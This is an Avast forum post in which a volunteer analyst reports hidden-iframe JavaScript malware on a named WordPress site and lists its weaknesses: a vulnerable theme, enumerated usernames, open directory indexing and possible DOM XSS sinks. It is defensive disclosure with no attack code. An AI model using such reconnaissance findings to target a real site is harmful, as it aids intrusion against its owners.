Avast community forum
Home
Help
Search
Login
Register
Avast WEBforum
»
Other
»
Viruses and worms
(Moderators:
Maxx_original
,
misak
) »
malicious code detected on Website!
« previous
next »
Print
Pages: [
1
]
Go Down
Author
Topic: malicious code detected on Website! (Read 2463 times)
0 Members and 1 Guest are viewing this topic.
polonus
Avast Überevangelist
Probably Bot
Posts: 33939
malware fighter
malicious code detected on Website!
«
on:
August 08, 2015, 12:25:07 AM »
Re:
https://www.virustotal.com/nl/url/67a62a9af440dfc095be7e2efea960018adfedf6dafafa12c74c5582782549cb/analysis/1438984809/
Re: ISSUE DETECTED DEFINITION INFECTED URL
Website Malware mwjs-iframe-hidden1?v25 -http://ozonopuntura.com
Website Malware mwjs-iframe-hidden1?v25 -http://ozonopuntura.com/404testpage4525d2fdc
Website Malware mwjs-iframe-hidden1?v25 -http://ozonopuntura.com/404javascript.js
Website Malware mwjs-iframe-hidden1?v25 -http://ozonopuntura.com/tratamientos/
Website Malware mwjs-iframe-hidden1?v25 -http://ozonopuntura.com/testimonios/
Website Malware mwjs-iframe-hidden1?v25 -http://ozonopuntura.com/?page_id=11
Known javascript malware. Details:
http://labs.sucuri.net/db/malware/mwjs-iframe-hidden1?v25
Alerted on scan here:
https://urlquery.net/report.php?id=1438984893423
Theme Creare Site 1.2.5 vulnerable, see the changes why:
https://themes.trac.wordpress.org/changeset?old_path=/creare-site/1.2.5&new_path=/creare-site/1.2.6
->
https://www.web8.ro/
The theme listed here is the active theme found in the HTML source of the page. A comprehensive assessment should include checking for other themes that are installed but not active as these can also contain exploitable security vulnerabilities. In a "black box" assessment or penetration test detection of all themes can be undertaken by brute forcing the theme paths . Alternatively if you have access to the host you could simply remove all unused themes.
Warning User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.
User ID 1 : admin
User ID 2 : liliacortez
Warning Directory Indexing Enabled
In the test we attempted to list the directory contents of the uploads and plugins folders to determine if Directory Indexing is enabled. This is an information leakage vulnerability that can reveal sensitive information regarding your site configuration or content.
/wp-content/uploads/ enabled
/wp-content/plugins/ disabled
See:
http://www.domxssscanner.com/scan?url=http%3A%2F%2Fozonopuntura.com
JQuery code here with a known sink:
https://wordpress.org/support/topic/jquery-migrate-vulnerability-or-false-alarm
http://www.domxssscanner.com/scan?url=http%3A%2F%2Fozonopuntura.com%2Fwp-includes%2Fjs%2Fjquery%2Fjquery-migrate.min.js%3Fver%3D1.2.1
(but no sources as one can establish).
See inside code here:
http://www.domxssscanner.com/scan?url=http%3A%2F%2Fozonopuntura.com%2Fwp-includes%2Fjs%2Fwp-emoji-release.min.js%3Fver%3D4.2.4
- WordPress core script issue:
https://core.trac.wordpress.org/attachment/ticket/31242/31242.18.patch
polonus (volunteer website security analyst and website error-hunter)
Logged
Cybersecurity is more of an attitude than anything else. Avast Evangelists.
Use NoScript, a limited user account and a virtual machine and be safe(r)!
Print
Pages: [
1
]
Go Up
« previous
next »
Avast WEBforum
»
Other
»
Viruses and worms
(Moderators:
Maxx_original
,
misak
) »
malicious code detected on Website!
